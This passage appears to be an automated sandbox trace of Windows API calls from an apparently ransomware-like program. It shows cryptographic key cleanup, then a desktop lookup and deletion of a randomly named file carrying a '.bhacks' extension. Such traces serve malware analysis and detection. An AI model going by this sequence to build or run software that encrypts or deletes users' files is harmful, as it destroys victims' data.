wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.740] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.740] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0102.740] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0102.740] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0102.740] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0102.740] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0102.740] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0102.740] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0102.740] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0102.740] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0102.740] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0102.740] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0102.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9ac0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0102.740] CryptDestroyKey (hKey=0x9a43c0) returned 1 [0102.741] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0102.741] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0102.741] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0102.741] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0102.741] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0102.741] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0102.741] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0102.741] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0102.741] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0102.741] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0102.741] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0102.741] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0102.741] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0102.741] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0102.741] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0102.741] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0102.741] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0102.741] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0102.741] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0102.741] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0102.741] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0102.741] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0102.741] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0102.741] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.742] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0102.742] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.742] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0102.742] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.742] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.742] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0102.742] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.742] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0102.742] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.742] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.742] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.742] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.742] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0102.742] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0102.742] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0102.742] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0102.742] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0102.742] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.742] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0102.742] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0102.742] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0102.742] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0102.742] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0102.742] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0102.743] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0102.743] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0102.743] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0102.743] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0102.743] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0102.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6ee0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0102.743] CryptReleaseContext (hProv=0x9beab0, dwFlags=0x0) returned 1 [0102.743] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.743] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0102.743] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0102.743] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0102.743] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0102.743] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0102.743] FreeLibrary (hLibModule=0x76390000) returned 1 [0102.743] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.743] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.743] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.743] CloseHandle (hObject=0x44c) returned 1 [0102.744] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.744] CloseHandle (hObject=0x458) returned 1 [0102.801] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.801] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0102.801] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0102.801] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0102.801] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/mCQMPnOOyUYP.gif.bhacks", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\mCQMPnOOyUYP.gif.bhacks", lpFilePart=0x8cedf4*="mCQMPnOOyUYP.gif.bhacks") returned 0x2f [0102.801] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\mCQMPnOOyUYP.gif.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\mcqmpnooyuyp.gif.bhacks")) returned 0x20 [0102.801] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\mCQMPnOOyUYP.gif.bhacks", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23ef8520, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23ef8520, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2402951c, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x2da0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="mCQMPnOOyUYP.gif.bhacks", cAlternateFileName="MCQMPN~1.BHA")) returned 0x9a3b80 [0102.802] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\mCQMPnOOyUYP.gif.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\mcqmpnooyuyp.gif.bhacks")) returned 1 [0102.863] FindNextFileW (in: hFindFile=0x9a3b80, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23ef8520, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23ef8520, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2402951c, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x2da0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="mCQMPnOOyUYP.gif.bhacks", cAlternateFileName="MCQMPN~1.BHA")) returned 0 [0102.863] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0102.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75fd8 | out: hHeap=0x2af0000) returned 1 [0102.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0102.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0102.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0102.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0102.863] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0102.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0102.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0102.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0102.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0102.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0102.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0102.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0102.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0102.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0102.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0102.863] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0102.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0102.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0102.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9040 [0102.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0102.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0102.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0102.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0102.864] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0102.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0102.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6610 [0102.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0102.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0102.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0102.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0102.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0102.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0102.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0102.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0102.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0102.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0102.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0102.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0102.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0102.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0102.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75498 [0102.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6610 | out: hHeap=0x2af0000) returned 1 [0102.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0102.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0102.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0102.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0102.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0102.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0102.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0102.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0102.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0102.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0102.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0102.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0102.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0102.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0102.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0102.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0102.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0102.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0102.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0102.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a68440 [0102.865] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/mCQMPnOOyUYP.gif.bhacks", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\mCQMPnOOyUYP.gif.bhacks", lpFilePart=0x8cf650*="mCQMPnOOyUYP.gif.bhacks") returned 0x2f [0102.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0102.865] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\mCQMPnOOyUYP.gif.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\mcqmpnooyuyp.gif.bhacks")) returned 0xffffffff [0102.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75498 | out: hHeap=0x2af0000) returned 1 [0102.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0102.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0102.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0102.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0102.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0102.865] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0102.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0102.865] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0102.866] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0102.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0102.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0102.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0102.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0102.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0102.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0102.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0102.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0102.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0102.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0102.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0102.866] 